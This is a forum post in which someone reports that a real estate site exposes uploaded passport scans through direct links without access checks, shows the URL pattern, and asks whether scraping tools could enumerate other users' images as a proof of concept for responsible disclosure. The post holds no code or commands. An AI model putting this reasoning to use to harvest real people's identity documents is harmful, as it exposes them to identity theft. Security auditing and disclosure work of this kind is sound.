Ruck Posted June 26, 2017 Share Posted June 26, 2017 Recently I have subscribed to a website for Real Estate agency, since I am look to buy a house. One of the requirements was to upload a scan of my passport. Already a bit anxious about the security I have covered sensitive elements with black tape before scanning and added a watermark stating the purpose of the scan before uploading. Not really suprised I got a mail stating my subscription was received with a direct link to the passport image uploaded. I have subscribed a second time to find out that the proces is the same and the link showed similar layout/components: <URL> / attachment_answers/000/428/835/<filename>.jpg.jpg?<id value> Compairing the received URL's to the image I did not find usable logic (for me). The numbering in the URL seems to be site generated (and problably related to project and subscription numbering), but not easy guessable/predictable. The filename corresponds to my uploaded filename + jpg extension (hence the double jpg). The ID value does not seem to prevent anything (removing still displays the passport image). Since I did not discover any real security countermeasures, I am wondering if tooling exists or could easily be created/scripted that is able to discover other images on the site, some sort of image scraping. Googling this question only returns scrapers with (wordlisting? bruteforcing?) filenames or directories. I want to know both for my own education (I'm active in the IT audit & security domain) and to be able to notify the Real Estate agency, but provided with a Proof of Concept (if it's easy to perform and within legal boundaries/responsible disclosure). Could anyone indicate wheter or not this is possible? And maybe an indication of effort and/or tooling required? If this requires additional information and/or further background of my intentions, please let me know what is required. Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.